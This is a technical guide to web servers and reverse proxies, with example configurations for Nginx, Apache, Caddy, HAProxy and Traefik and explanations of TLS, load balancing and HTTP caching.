Web Servers and Reverse Proxies¶

Web servers and reverse proxies are critical infrastructure components that sit between clients and application servers, handling HTTP traffic, SSL/TLS termination, load balancing, static file serving, and more. Understanding how they work is essential for deploying and operating web applications in production.

How Web Traffic Flows in Production¶

A typical production request flow involves multiple layers, each adding functionality (and latency):

Client (Browser/App)
    │
    ▼
DNS Resolution (Route 53, Cloudflare)
    │  Recursive resolver → Root → TLD → Authoritative
    │  Cached at each layer (TTL-based)
    ▼
CDN (CloudFront, Cloudflare) ──── Cache HIT? → Return cached response
    │ Cache MISS
    ▼
Load Balancer (ALB, Nginx, HAProxy)
    │  Distributes across healthy backends
    │  L4 (TCP) or L7 (HTTP) routing
    ▼
Reverse Proxy / Web Server (Nginx, Caddy)
    │  - SSL/TLS termination
    │  - Static file serving
    │  - Request routing
    │  - Rate limiting
    │  - Compression (gzip/brotli)
    │  - Request/response header manipulation
    ▼
Application Server (Gunicorn, uvicorn, Node.js, Actix)
    │  Business logic execution
    ▼
Backend Services (Database, Cache, Message Queue, External APIs)

DNS Resolution in Detail¶

When a browser needs to resolve api.example.com:

Browser cache: Checks its own DNS cache (Chrome: chrome://net-internals/#dns)
OS cache: Checks the operating system's DNS resolver cache
Recursive resolver: Sends query to configured DNS server (ISP, 8.8.8.8, 1.1.1.1)
Root nameserver: Directs to the .com TLD nameserver
TLD nameserver: Directs to example.com's authoritative nameserver
Authoritative nameserver: Returns the IP address (or CNAME, then another lookup)

Each answer includes a TTL (Time to Live) that determines how long the result is cached. Short TTLs (60s) enable fast failover but increase DNS query load; long TTLs (3600s) reduce load but delay propagation of changes.

HTTP Protocol Versions¶

Version	Multiplexing	Header Compression	Transport	Key Improvement
HTTP/1.1	No (one request per TCP connection, or pipelining with head-of-line blocking)	No	TCP	Persistent connections, chunked transfer
HTTP/2	Yes (multiple streams over one TCP connection)	HPACK	TCP	Eliminates HOL blocking at HTTP level, server push
HTTP/3	Yes (multiple streams over QUIC)	QPACK	QUIC (UDP)	Eliminates TCP HOL blocking, faster handshakes (0-RTT)

HTTP/2 is the baseline for modern web serving. It reduces latency by multiplexing requests over a single TCP connection, compressing headers, and allowing server push. However, TCP's head-of-line blocking means a single lost packet stalls all streams.

HTTP/3 solves this by using QUIC (built on UDP), where each stream is independent—a lost packet only stalls its own stream. QUIC also combines the TLS and transport handshakes, achieving 0-RTT connection establishment for repeat visitors.

The TLS Handshake¶

Every HTTPS connection begins with a TLS handshake that establishes encryption:

TLS 1.3 Handshake (1 round trip):

Client                              Server
  │                                    │
  │──── ClientHello ──────────────────▶│  Supported cipher suites, key share
  │                                    │
  │◀─── ServerHello + Certificate ─────│  Chosen cipher, server cert, key share
  │     EncryptedExtensions            │
  │     Finished                       │
  │                                    │
  │──── Finished ─────────────────────▶│  Client confirms
  │                                    │
  │◀═══ Encrypted Application Data ═══▶│  All subsequent data encrypted

TLS 1.3 reduced the handshake from 2 round trips (TLS 1.2) to 1 round trip, and supports 0-RTT (zero round trip time) for repeat connections by caching session parameters. The trade-off with 0-RTT is replay attack vulnerability—it should only be used for idempotent requests (GET).

Nginx¶

Nginx (pronounced "engine-x") is the most widely used web server and reverse proxy, serving approximately 34% of all websites. It uses an asynchronous, event-driven architecture that handles thousands of concurrent connections efficiently with minimal memory overhead.

Core Architecture¶

Nginx uses a master-worker process model:

Master process: Reads configuration, binds to ports, manages worker processes. Runs as root (needs root for port 80/443) but workers run as unprivileged user (nginx or www-data).
Worker processes: Handle actual HTTP requests. Each worker is single-threaded but uses non-blocking I/O (epoll on Linux, kqueue on BSD/macOS) to handle thousands of connections concurrently.

              ┌── Master Process ──┐
              │  Config loading    │
              │  Port binding      │
              │  Worker management │
              └────────┬───────────┘
           ┌───────────┼───────────┐
           ▼           ▼           ▼
      ┌─Worker 1─┐ ┌─Worker 2┐ ┌─Worker N─┐
      │ Event    │ │ Event   │ │ Event    │
      │ Loop     │ │ Loop    │ │ Loop     │
      │ (epoll)  │ │ (epoll) │ │ (epoll)  │
      │          │ │         │ │          │
      │ 1000s of │ │ 1000s   │ │ 1000s of │
      │ connections│ │of conn │ │ connections│
      └──────────┘ └─────────┘ └──────────┘

Why event-driven is efficient: Traditional web servers (Apache prefork) spawn a process per connection—10,000 connections means 10,000 processes, each consuming ~10MB of memory. Nginx handles 10,000 connections in a single worker process using ~25MB total, because it never blocks waiting for I/O. Instead, it registers callbacks with the OS kernel (epoll_wait) and processes events as they become ready.

How epoll works: The Linux kernel's epoll system call efficiently monitors thousands of file descriptors. When a worker calls epoll_wait(), the kernel returns only the file descriptors that have activity (data received, write buffer available). The worker processes these events, initiates non-blocking I/O operations, and loops back to epoll_wait(). This means a single thread can manage thousands of concurrent connections with near-zero idle overhead.

Configuration Deep Dive¶

Location Matching¶

Nginx evaluates location blocks in a specific priority order:

# Priority order (highest to lowest):
# 1. Exact match (=)
location = /favicon.ico { }           # Only matches exactly "/favicon.ico"

# 2. Preferential prefix (^~)
location ^~ /static/ { }              # Prefix match, stops regex search

# 3. Regular expression (~ case-sensitive, ~* case-insensitive)
location ~ \.php$ { }                 # Matches *.php (case-sensitive)
location ~* \.(jpg|png|gif)$ { }      # Matches image files (case-insensitive)

# 4. Prefix match (longest wins)
location /api/ { }                     # Matches /api/anything
location /api/v2/ { }                  # Matches /api/v2/anything (longer prefix wins)
location / { }                         # Catch-all (shortest prefix)

The matching algorithm: Nginx first checks all prefix locations and remembers the longest match. Then it checks regex locations in config order—the first regex match wins. If no regex matches, the longest prefix match is used. The = modifier skips all other checks, and ^~ skips regex checking.

Upstream Configuration¶

upstream app_backend {
    # Load balancing algorithm
    least_conn;                    # Route to server with fewest active connections
    # Other options: round_robin (default), ip_hash, hash, random

    # Backend servers with configuration
    server 127.0.0.1:8001 weight=3;        # Gets 3x traffic
    server 127.0.0.1:8002 weight=1;        # Gets 1x traffic
    server 127.0.0.1:8003 backup;          # Only used if others are down
    server 127.0.0.1:8004 down;            # Marked as permanently unavailable

    # Health checking (passive — based on actual traffic)
    # max_fails: number of failed attempts before marking server as unavailable
    # fail_timeout: time window for max_fails AND how long to mark server as down
    server 127.0.0.1:8005 max_fails=3 fail_timeout=30s;

    # Keep-alive connections to upstream (reduces TCP handshake overhead)
    keepalive 32;                  # Pool of 32 keep-alive connections per worker
    keepalive_timeout 60s;         # Close idle connections after 60 seconds
    keepalive_requests 1000;       # Max requests per keep-alive connection
}

Caching Configuration¶

# Define a cache zone (in http block)
proxy_cache_path /var/cache/nginx/app
    levels=1:2                    # Two-level directory hashing
    keys_zone=app_cache:10m       # 10MB of shared memory for cache keys (~80,000 keys)
    max_size=1g                   # Maximum disk usage
    inactive=60m                  # Remove cached items not accessed in 60 minutes
    use_temp_path=off;            # Write directly to cache dir (better performance)

server {
    location /api/ {
        proxy_pass http://app_backend;
        proxy_cache app_cache;

        # Cache configuration
        proxy_cache_valid 200 10m;         # Cache 200 responses for 10 minutes
        proxy_cache_valid 404 1m;          # Cache 404 responses for 1 minute
        proxy_cache_valid any 5m;          # Cache everything else for 5 minutes
        proxy_cache_key "$scheme$request_method$host$request_uri";
        proxy_cache_use_stale error timeout updating http_500 http_502 http_503;
        # ↑ Serve stale cached content when backend is erroring or updating

        # Add headers to show cache status
        add_header X-Cache-Status $upstream_cache_status;
        # Values: MISS, HIT, STALE, UPDATING, BYPASS, EXPIRED, REVALIDATED

        # Bypass cache for specific conditions
        proxy_cache_bypass $http_authorization;    # Don't cache authenticated requests
        proxy_no_cache $http_authorization;
    }
}

WebSocket Proxying¶

WebSocket connections require special proxy configuration because they upgrade from HTTP to a persistent bidirectional protocol:

location /ws/ {
    proxy_pass http://app_backend;
    proxy_http_version 1.1;

    # These headers are required for WebSocket upgrade
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";

    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;

    # WebSocket connections are long-lived — increase timeouts
    proxy_read_timeout 3600s;      # 1 hour
    proxy_send_timeout 3600s;
}

Performance Tuning¶

# /etc/nginx/nginx.conf — Performance-optimized configuration

# Worker processes: one per CPU core
worker_processes auto;

# File descriptor limit per worker (must be >= worker_connections * 2)
worker_rlimit_nofile 65535;

events {
    worker_connections 4096;       # Max connections per worker
    use epoll;                     # Linux kernel event notification mechanism
    multi_accept on;               # Accept multiple connections at once
}

http {
    # Sendfile: let the kernel send files directly from disk to socket
    # bypassing user-space (zero-copy). Crucial for static file performance.
    sendfile on;

    # tcp_nopush: send headers and the beginning of a file in one TCP packet
    # Works with sendfile. Reduces number of packets for large file transfers.
    tcp_nopush on;

    # tcp_nodelay: disable Nagle's algorithm — send data immediately
    # without waiting to fill a TCP packet. Reduces latency for small responses.
    tcp_nodelay on;

    # Keep-alive optimization
    keepalive_timeout 65;          # Close idle connections after 65 seconds
    keepalive_requests 10000;      # Max requests per keep-alive connection

    # Buffer optimization
    client_body_buffer_size 16k;   # Buffer for client request bodies
    client_header_buffer_size 1k;  # Buffer for client request headers
    large_client_header_buffers 4 8k;  # For large headers (cookies, auth tokens)
    client_max_body_size 10m;      # Max upload size

    # Proxy buffer optimization
    proxy_buffer_size 4k;          # Buffer for first part of response (headers)
    proxy_buffers 8 16k;           # 8 buffers of 16k for response body
    proxy_busy_buffers_size 32k;   # Max size of buffers being sent to client

    # Compression
    gzip on;
    gzip_vary on;                  # Add Vary: Accept-Encoding header
    gzip_proxied any;              # Compress proxied responses too
    gzip_comp_level 4;             # 1-9 (4 is good balance of CPU vs compression)
    gzip_min_length 1000;          # Don't compress tiny responses
    gzip_types
        text/plain
        text/css
        text/xml
        text/javascript
        application/json
        application/javascript
        application/xml
        application/rss+xml
        image/svg+xml;

    # Logging (optional: disable access log for high-traffic static assets)
    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log warn;
}

Worker connections calculation: Each proxy connection uses 2 file descriptors (one for client, one for upstream). So worker_connections 4096 supports ~2048 simultaneous proxy connections per worker. With 4 workers, that's ~8192 concurrent connections. Adjust worker_rlimit_nofile to at least worker_connections * 2.

Security Configuration¶

# Rate limiting: multiple zones for different endpoints
limit_req_zone $binary_remote_addr zone=general:10m rate=30r/s;
limit_req_zone $binary_remote_addr zone=auth:10m rate=5r/m;
limit_req_zone $binary_remote_addr zone=api:10m rate=100r/s;

# Connection limiting
limit_conn_zone $binary_remote_addr zone=addr:10m;

server {
    listen 443 ssl http2;
    server_name example.com;

    # SSL/TLS Configuration (modern)
    ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers 'ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384';
    ssl_prefer_server_ciphers off;     # Let client choose (TLS 1.3 ignores this)

    # OCSP Stapling: server fetches certificate revocation status and sends it
    # to clients, avoiding the client needing to contact the CA
    ssl_stapling on;
    ssl_stapling_verify on;
    ssl_trusted_certificate /etc/letsencrypt/live/example.com/chain.pem;
    resolver 8.8.8.8 8.8.4.4 valid=300s;

    # Session caching: avoid repeating full TLS handshake for returning clients
    ssl_session_cache shared:SSL:10m;
    ssl_session_timeout 1d;
    ssl_session_tickets off;       # Disable for forward secrecy

    # Security Headers
    add_header X-Frame-Options "SAMEORIGIN" always;
    add_header X-Content-Type-Options "nosniff" always;
    add_header X-XSS-Protection "1; mode=block" always;
    add_header Referrer-Policy "strict-origin-when-cross-origin" always;
    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always;
    add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'" always;
    add_header Permissions-Policy "camera=(), microphone=(), geolocation=()" always;

    # Hide Nginx version
    server_tokens off;

    # Request size limit (prevent upload abuse)
    client_max_body_size 10m;

    # Rate limiting applied per location
    location /api/auth/ {
        limit_req zone=auth burst=3 nodelay;
        limit_conn addr 5;
        proxy_pass http://app_backend;
    }

    location /api/ {
        limit_req zone=api burst=20 nodelay;
        # burst=20: allow bursts of 20 requests beyond the rate
        # nodelay: process burst requests immediately (don't queue them)
        proxy_pass http://app_backend;
    }
}

Rate limiting explained: rate=100r/s creates a token bucket that fills at 100 tokens per second. Each request consumes one token. burst=20 adds a buffer of 20 tokens. Without nodelay, excess requests within the burst are delayed (queued); with nodelay, they're processed immediately but the burst bucket still drains at the configured rate.

Production Configuration Example¶

# /etc/nginx/nginx.conf — Complete production configuration

user nginx;
worker_processes auto;
pid /run/nginx.pid;
worker_rlimit_nofile 65535;
error_log /var/log/nginx/error.log warn;

events {
    worker_connections 4096;
    use epoll;
    multi_accept on;
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    # Logging format with timing info
    log_format main '$remote_addr - $remote_user [$time_local] '
                    '"$request" $status $body_bytes_sent '
                    '"$http_referer" "$http_user_agent" '
                    'rt=$request_time uct=$upstream_connect_time '
                    'uht=$upstream_header_time urt=$upstream_response_time';

    access_log /var/log/nginx/access.log main;

    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 65;
    keepalive_requests 10000;

    gzip on;
    gzip_vary on;
    gzip_proxied any;
    gzip_comp_level 4;
    gzip_min_length 1000;
    gzip_types text/plain text/css text/xml text/javascript
               application/json application/javascript application/xml
               image/svg+xml;

    # Rate limiting zones
    limit_req_zone $binary_remote_addr zone=auth:10m rate=5r/m;
    limit_req_zone $binary_remote_addr zone=api:10m rate=100r/s;

    # Upstream backends
    upstream app_backend {
        least_conn;
        server 127.0.0.1:8001 max_fails=3 fail_timeout=30s;
        server 127.0.0.1:8002 max_fails=3 fail_timeout=30s;
        server 127.0.0.1:8003 max_fails=3 fail_timeout=30s;
        keepalive 64;
    }

    # HTTP → HTTPS redirect
    server {
        listen 80;
        server_name example.com www.example.com;
        return 301 https://example.com$request_uri;
    }

    # www → non-www redirect
    server {
        listen 443 ssl http2;
        server_name www.example.com;
        ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
        ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
        return 301 https://example.com$request_uri;
    }

    # Main server block
    server {
        listen 443 ssl http2;
        server_name example.com;

        ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
        ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
        ssl_protocols TLSv1.2 TLSv1.3;
        ssl_session_cache shared:SSL:10m;
        ssl_session_timeout 1d;
        ssl_stapling on;
        ssl_stapling_verify on;

        add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
        add_header X-Frame-Options "SAMEORIGIN" always;
        add_header X-Content-Type-Options "nosniff" always;
        server_tokens off;

        # Static files
        location /static/ {
            alias /var/www/app/static/;
            expires 365d;
            add_header Cache-Control "public, immutable";
            access_log off;
        }

        # Health check endpoint (for load balancer)
        location = /health {
            access_log off;
            return 200 "healthy\n";
            add_header Content-Type text/plain;
        }

        # Auth endpoints (strict rate limiting)
        location /api/auth/ {
            limit_req zone=auth burst=3 nodelay;
            proxy_pass http://app_backend;
            include /etc/nginx/proxy_params;
        }

        # API endpoints
        location /api/ {
            limit_req zone=api burst=20 nodelay;
            proxy_pass http://app_backend;
            include /etc/nginx/proxy_params;
        }

        # WebSocket
        location /ws/ {
            proxy_pass http://app_backend;
            proxy_http_version 1.1;
            proxy_set_header Upgrade $http_upgrade;
            proxy_set_header Connection "upgrade";
            proxy_read_timeout 3600s;
            include /etc/nginx/proxy_params;
        }

        # Frontend (SPA)
        location / {
            root /var/www/app/dist;
            try_files $uri $uri/ /index.html;
        }
    }
}

Apache HTTP Server¶

Apache is one of the oldest and most configurable web servers (since 1995). Unlike Nginx's event-driven model, Apache traditionally uses a process-per-connection (prefork) or thread-per-connection (worker) model, though the modern event MPM is event-driven.

Multi-Processing Modules (MPMs)¶

MPM	Model	Connections	Memory	Use Case
prefork	One process per connection	Low (hundreds)	High (~10MB/process)	PHP mod_php (not thread-safe), maximum stability
worker	Thread pool per process	Medium (thousands)	Medium (~1MB/thread)	Thread-safe applications, moderate traffic
event	Event-driven + thread pool	High (thousands)	Lower	Modern default, similar to Nginx for keep-alive

The event MPM is Apache's answer to Nginx's efficiency. It uses dedicated threads to handle keep-alive connections, freeing worker threads to process requests. For keep-alive-heavy workloads, event MPM dramatically reduces resource usage compared to prefork.

Apache vs. Nginx¶

Feature	Nginx	Apache
Architecture	Event-driven, async	Process/thread per connection (or event MPM)
Performance	Excellent for static content, reverse proxy	Good, but higher memory per connection
Configuration	Centralized files, requires reload	`.htaccess` for per-directory overrides (no reload)
Module loading	Compiled-in or dynamic (limited)	Highly modular, dynamic loading at runtime
URL rewriting	`rewrite` directive (simpler)	`mod_rewrite` (powerful but complex regex engine)
Use case	Reverse proxy, load balancer, static files	Dynamic content (mod_php), .htaccess flexibility
Market share	~34%	~29% (declining)

When to use Apache: Apache's .htaccess files allow per-directory configuration without reloading the server—useful for shared hosting where users need to configure their own URL rewrites, authentication, and caching rules. However, .htaccess has a performance cost: Apache checks for .htaccess files in every directory in the path for every request.

mod_rewrite¶

Apache's mod_rewrite is a powerful URL rewriting engine used for redirects, pretty URLs, and complex routing:

# .htaccess — Common mod_rewrite patterns

RewriteEngine On

# Force HTTPS
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

# Remove trailing slash
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)/$ /$1 [L,R=301]

# SPA fallback (route all non-file requests to index.html)
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.html [L]

# Proxy API requests to backend
RewriteRule ^api/(.*)$ http://localhost:8080/api/$1 [P,L]

Caddy¶

Caddy is a modern web server written in Go, notable for automatic HTTPS (obtains and renews Let's Encrypt certificates automatically with zero configuration).

Automatic HTTPS Internals¶

Caddy implements the ACME (Automatic Certificate Management Environment) protocol to obtain certificates from Let's Encrypt:

Challenge: Caddy proves domain ownership using one of:
HTTP-01: Place a token at http://domain/.well-known/acme-challenge/TOKEN (requires port 80)
TLS-ALPN-01: Present a self-signed certificate with a specific ALPN extension during TLS handshake (requires port 443)
DNS-01: Create a DNS TXT record _acme-challenge.domain (works behind firewalls, supports wildcards)
Issuance: Once verified, Let's Encrypt issues the certificate (valid for 90 days)
Renewal: Caddy automatically renews certificates ~30 days before expiration
OCSP stapling: Caddy automatically staples OCSP responses

Caddyfile Configuration¶

# Caddyfile — Caddy's configuration format
example.com {
    # Automatic HTTPS — no SSL config needed!

    # Reverse proxy to application
    reverse_proxy /api/* localhost:8080 {
        # Load balancing
        lb_policy least_conn

        # Health checking
        health_uri /health
        health_interval 10s
        health_timeout 5s

        # Headers
        header_up X-Real-IP {remote_host}
        header_up X-Forwarded-Proto {scheme}

        # Transport configuration
        transport http {
            keepalive 30s
            keepalive_idle_conns 64
        }
    }

    # Static file serving
    root * /var/www/site
    file_server {
        hide .git .env
    }

    # Compression
    encode gzip zstd

    # Security headers
    header {
        X-Frame-Options "SAMEORIGIN"
        X-Content-Type-Options "nosniff"
        Strict-Transport-Security "max-age=31536000"
        -Server                         # Remove Server header
    }

    # Rate limiting (with caddy-ratelimit plugin)
    rate_limit {remote.host} 100r/m

    # Logging
    log {
        output file /var/log/caddy/access.log {
            roll_size 100mb
            roll_keep 5
        }
        format json
    }
}

Caddy vs. Nginx: Caddy's primary advantages are automatic HTTPS, simpler configuration syntax, and a single binary with no dependencies. Nginx has a larger ecosystem, more community resources, and marginally better raw performance for extremely high-throughput scenarios. For most applications, the difference is negligible, and Caddy's simplicity reduces operational risk.

HAProxy¶

HAProxy (High Availability Proxy) is a dedicated, high-performance load balancer and proxy. While Nginx handles both web serving and proxying, HAProxy is purpose-built for proxying and load balancing, and excels at very high connection rates (millions of concurrent connections).

Architecture¶

HAProxy uses a single-process, event-driven model (similar to Nginx workers). It's designed for maximum throughput and minimum latency in the proxy path.

Configuration¶

# /etc/haproxy/haproxy.cfg

global
    log /dev/log local0
    maxconn 50000
    user haproxy
    group haproxy
    daemon

    # SSL tuning
    ssl-default-bind-options ssl-min-ver TLSv1.2
    ssl-default-bind-ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256
    tune.ssl.default-dh-param 2048

defaults
    log     global
    mode    http                    # Layer 7 mode (use 'tcp' for Layer 4)
    option  httplog                 # Detailed HTTP logging
    option  dontlognull             # Don't log health check connections
    option  forwardfor              # Add X-Forwarded-For header
    timeout connect 5s
    timeout client  30s
    timeout server  30s
    timeout http-keep-alive 10s
    timeout http-request 10s        # Max time for client to send full request

    # Retry on connection failure
    retries 3
    option redispatch               # Retry on a different server if one fails

# Stats dashboard (accessible at :8404/stats)
frontend stats
    bind *:8404
    stats enable
    stats uri /stats
    stats refresh 10s
    stats auth admin:secretpassword

# Frontend: incoming traffic
frontend http_front
    bind *:80
    bind *:443 ssl crt /etc/ssl/certs/example.pem
    redirect scheme https if !{ ssl_fc }

    # Route based on host header
    acl is_api hdr(host) -i api.example.com
    acl is_web hdr(host) -i www.example.com

    use_backend api_servers if is_api
    default_backend web_servers

# Backend: API servers
backend api_servers
    balance leastconn
    option httpchk GET /health      # Active health checking

    # Health check configuration
    default-server inter 5s fall 3 rise 2
    # inter: check every 5s | fall: 3 failures = down | rise: 2 successes = up

    server api1 10.0.1.10:8080 check weight 100
    server api2 10.0.1.11:8080 check weight 100
    server api3 10.0.1.12:8080 check weight 50    # Smaller instance, less traffic

    # Connection draining: when a server is marked "drain",
    # existing connections finish but no new ones are routed
    # Useful during deployments: mark server drain → wait → deploy → mark ready

# Backend: Web servers
backend web_servers
    balance roundrobin
    option httpchk GET /health
    cookie SRVID insert indirect nocache  # Session persistence via cookie

    server web1 10.0.2.10:3000 check cookie web1
    server web2 10.0.2.11:3000 check cookie web2

HAProxy Stick Tables¶

Stick tables track connection information for rate limiting, session persistence, and abuse detection:

# Rate limiting with stick tables
frontend http_front
    bind *:443 ssl crt /etc/ssl/certs/example.pem

    # Track request rates per IP
    stick-table type ip size 100k expire 30s store http_req_rate(10s)
    http-request track-sc0 src
    http-request deny deny_status 429 if { sc_http_req_rate(0) gt 100 }
    # ↑ Deny with 429 if more than 100 requests in 10 seconds from same IP

Traefik¶

Traefik is a modern reverse proxy designed for microservices and container environments. Its killer feature is automatic service discovery: it watches Docker, Kubernetes, and other orchestrators and automatically configures routing to new services.

Docker Integration¶

# docker-compose.yml with Traefik
version: '3'

services:
  traefik:
    image: traefik:v3.0
    command:
      - --api.dashboard=true
      - --providers.docker=true
      - --providers.docker.exposedByDefault=false
      - --entrypoints.web.address=:80
      - --entrypoints.websecure.address=:443
      - --certificatesresolvers.letsencrypt.acme.email=admin@example.com
      - --certificatesresolvers.letsencrypt.acme.storage=/letsencrypt/acme.json
      - --certificatesresolvers.letsencrypt.acme.httpchallenge.entrypoint=web
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock:ro
      - letsencrypt:/letsencrypt

  api:
    image: myapp/api:latest
    labels:
      # Traefik discovers this service via Docker labels
      - traefik.enable=true
      - traefik.http.routers.api.rule=Host(`api.example.com`)
      - traefik.http.routers.api.tls.certresolver=letsencrypt
      - traefik.http.services.api.loadbalancer.server.port=8080

      # Middleware: rate limiting
      - traefik.http.middlewares.api-ratelimit.ratelimit.average=100
      - traefik.http.middlewares.api-ratelimit.ratelimit.burst=50
      - traefik.http.routers.api.middlewares=api-ratelimit

  frontend:
    image: myapp/frontend:latest
    labels:
      - traefik.enable=true
      - traefik.http.routers.frontend.rule=Host(`www.example.com`)
      - traefik.http.routers.frontend.tls.certresolver=letsencrypt

volumes:
  letsencrypt:

Traefik vs. Nginx as Kubernetes Ingress: Traefik natively integrates with Kubernetes IngressRoute CRDs and automatically discovers services. Nginx Ingress Controller requires ConfigMaps or annotations and has a more traditional configuration model. Traefik is often preferred for dynamic environments; Nginx Ingress for environments where the configuration is more static and the Nginx ecosystem (ModSecurity, etc.) is needed.

Load Balancing Deep Dive¶

Algorithms¶

Algorithm	Description	Best For
Round Robin	Distributes requests sequentially across servers	Equal-capacity servers, stateless requests
Weighted Round Robin	Like round robin, but servers with higher weights get more traffic	Mixed server sizes (e.g., c5.xlarge + c5.2xlarge)
Least Connections	Routes to the server with fewest active connections	Requests with variable processing times
IP Hash	Hash of client IP determines server (consistent mapping)	Session persistence without cookies
Consistent Hashing	Hash ring that minimizes redistribution when servers are added/removed	Caching proxies (only 1/N keys move when adding a server)
Random Two Choices	Pick 2 random servers, route to the one with fewer connections	Large server pools (simple, surprisingly effective)

Consistent hashing is worth understanding deeply. Traditional hash-based routing (e.g., server = hash(client_ip) % N) breaks when N changes—adding or removing a server remaps almost all clients. Consistent hashing places servers on a virtual ring (hash values 0 to 2^32). Each request is hashed and routed to the next server clockwise on the ring. When a server is added, only its neighbors' traffic is affected (~1/N keys move instead of all).

Consistent Hash Ring:

        Server A (hash: 100)
           /
    ──────●─────────────────●── Server B (hash: 300)
    │                       │
    │    Hash Ring          │
    │    (0 to 2^32)        │
    │                       │
    ──────●─────────────────●── Server D (hash: 700)
           \
        Server C (hash: 500)

Request with hash 250 → routes to Server B (next clockwise)
Request with hash 450 → routes to Server C
Adding Server E (hash: 400) → only requests 301-400 move from C to E

Layer 4 vs. Layer 7 Load Balancing¶

Feature	Layer 4 (TCP/UDP)	Layer 7 (HTTP/HTTPS)
Routing basis	IP address, port	URL path, host header, cookies, HTTP headers
Performance	Higher throughput, lower latency	Slightly lower throughput (must parse HTTP)
SSL termination	Passthrough or termination	Termination (can inspect HTTP after decryption)
Features	Basic health checks, connection limiting	Content-based routing, header manipulation, WAF
Use cases	Database load balancing, raw TCP services, ultra-high throughput	HTTP APIs, web applications, microservice routing
AWS service	NLB (Network Load Balancer)	ALB (Application Load Balancer)

When to use L4: When you need the absolute highest performance (millions of requests/sec), when the backend protocol isn't HTTP (databases, custom TCP protocols), or when you want SSL passthrough (backend handles its own TLS).

When to use L7: When you need content-based routing (route /api/v1/users to user-service, /api/v1/orders to order-service), when you need to inspect or modify HTTP headers, or when you want advanced features like sticky sessions with cookies.

Health Checking¶

Type	Mechanism	Pros	Cons
Active	Load balancer periodically sends health check requests to backends	Detects failures before user traffic is affected	Adds load to backends, may trigger rate limits
Passive	Monitor actual traffic responses for errors	No additional load, reflects real user experience	Requires traffic to detect failures (cold start problem)
Combined	Active checks supplement passive monitoring	Best of both worlds	More complex configuration

# Nginx active health checking (requires nginx-plus or third-party module)
upstream backend {
    zone backend 64k;
    server 10.0.1.1:8080;
    server 10.0.1.2:8080;

    # Check /health every 5 seconds, consider healthy after 2 passes,
    # unhealthy after 3 failures
    health_check interval=5s fails=3 passes=2 uri=/health;
}

Connection Draining¶

During deployments, you need to gracefully remove servers from the load balancer pool without dropping active connections:

Mark server as draining: Stop routing new connections to it
Wait for active connections to complete: Set a drain timeout (e.g., 30 seconds)
Deploy: Update the application on the drained server
Re-add server: Mark it as healthy and start routing traffic again

This is handled automatically by Kubernetes during rolling updates (via terminationGracePeriodSeconds and preStop hooks) and by cloud load balancers (deregistration delay on target groups).

Caching at the Proxy Layer¶

Cache-Control Headers¶

HTTP caching is governed by the Cache-Control header. Understanding these directives is essential:

Directive	Description
`public`	Response can be cached by any cache (CDN, proxy, browser)
`private`	Response can only be cached by the browser (not CDN/proxy)
`no-cache`	Cache can store the response BUT must revalidate with origin before serving (misleading name!)
`no-store`	Response must never be cached anywhere
`max-age=N`	Response is fresh for N seconds
`s-maxage=N`	Like max-age but only for shared caches (CDN/proxy) — overrides max-age for shared caches
`stale-while-revalidate=N`	Serve stale content for N seconds while fetching fresh content in background
`stale-if-error=N`	Serve stale content for N seconds if origin returns an error
`immutable`	Content will never change — browser should never revalidate (use with cache-busted URLs)

Practical caching strategy:

Static assets (hashed filenames: app.a1b2c3.js):
  Cache-Control: public, max-age=31536000, immutable

API responses (user-specific):
  Cache-Control: private, no-cache

API responses (public, changes slowly):
  Cache-Control: public, max-age=300, stale-while-revalidate=60

HTML pages:
  Cache-Control: no-cache
  (Always revalidate, but can use 304 Not Modified with ETag)

Authenticated API responses:
  Cache-Control: private, no-store

Microcaching¶

Even caching dynamic content for 1 second can dramatically reduce backend load under high traffic. If 10,000 requests hit the same endpoint within 1 second, only 1 reaches the backend:

proxy_cache_path /var/cache/nginx/micro
    levels=1:2 keys_zone=micro:1m max_size=100m;

location /api/popular-endpoint {
    proxy_pass http://app_backend;
    proxy_cache micro;
    proxy_cache_valid 200 1s;          # Cache successful responses for just 1 second
    proxy_cache_lock on;               # Only one request fetches from backend;
                                       # others wait for the cached result
    proxy_cache_use_stale updating;    # Serve stale while refreshing
}

Reverse Proxy vs. Forward Proxy¶

Feature	Reverse Proxy	Forward Proxy
Position	In front of servers	In front of clients
Purpose	Protect/optimize backend servers	Protect/anonymize clients
Use cases	Load balancing, SSL termination, caching, security, compression	Corporate firewalls, anonymity, content filtering, compliance
Client awareness	Client doesn't know about backend servers	Server doesn't know about actual clients
Configuration	Server-side (server admin configures)	Client-side (client configures proxy settings)
Examples	Nginx, Caddy, HAProxy, Traefik	Squid, corporate proxies, VPNs, SOCKS proxies

Reverse proxy use cases in detail: - SSL/TLS termination: Decrypt HTTPS at the proxy so backend servers handle plain HTTP (simpler, faster backend processing) - Static file serving: Serve CSS/JS/images directly from disk without hitting the application server - Compression: gzip/brotli compress responses, reducing bandwidth usage by 60-80% - Request buffering: Buffer slow client uploads and send to backend all at once, freeing the backend connection - Security: Hide backend topology, rate limit abusive clients, filter malicious requests - A/B testing: Route percentage of traffic to different backend versions

